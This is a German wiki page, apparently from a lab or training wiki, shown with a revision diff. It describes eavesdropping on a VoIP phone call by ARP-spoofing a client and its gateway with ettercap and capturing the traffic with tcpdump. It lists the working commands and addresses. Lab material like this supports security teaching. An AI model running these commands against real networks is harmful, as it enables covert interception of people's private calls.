Arpspoofing mit Ettercap Gateway vorgauckeln VoIP Traffic Mitschnitt: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Telefongespräch mitschneiden= ==Versuchsaufbau== {{#drawio:telefon-gespraech-spoofing}} ==Vorgehensweise== *Wir müssen uns in der selben Broadcastdomain be…“) |
|||
| (2 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 17: | Zeile 17: | ||
==Spoofing== | ==Spoofing== | ||
*sudo tcpdump -ni enp0s31f6 host 10.81.31.6 -s 1500 -w intercept.cap | *sudo tcpdump -ni enp0s31f6 host 10.81.31.6 -s 1500 -w intercept.cap | ||
| + | =Intercept Capture Datei= | ||
| + | *[[Media:intercept.cap|intercept.cap]] | ||
Aktuelle Version vom 18. September 2023, 07:16 Uhr
Telefongespräch mitschneiden
Versuchsaufbau
Vorgehensweise
- Wir müssen uns in der selben Broadcastdomain befinden.
- Wir starten eine Man in the Middle Attacke.
- Sie wird über Arpspoofing umgesetzt.
- Der Verkehr zum Telefon von Alice wird, mit tcpdump, komplett mitgeschnitten.
- Wir werten ihn später mit wireshark aus.
Variablen
- CLIENT=10.81.31.6
- GATEWAY=10.81.0.1
- INTERFACE=enp0s31f6
Attacke
- ettercap -i $INTERFACE -Tq -M ARP /$CLIENT// /$GATEWAY//
Spoofing
- sudo tcpdump -ni enp0s31f6 host 10.81.31.6 -s 1500 -w intercept.cap
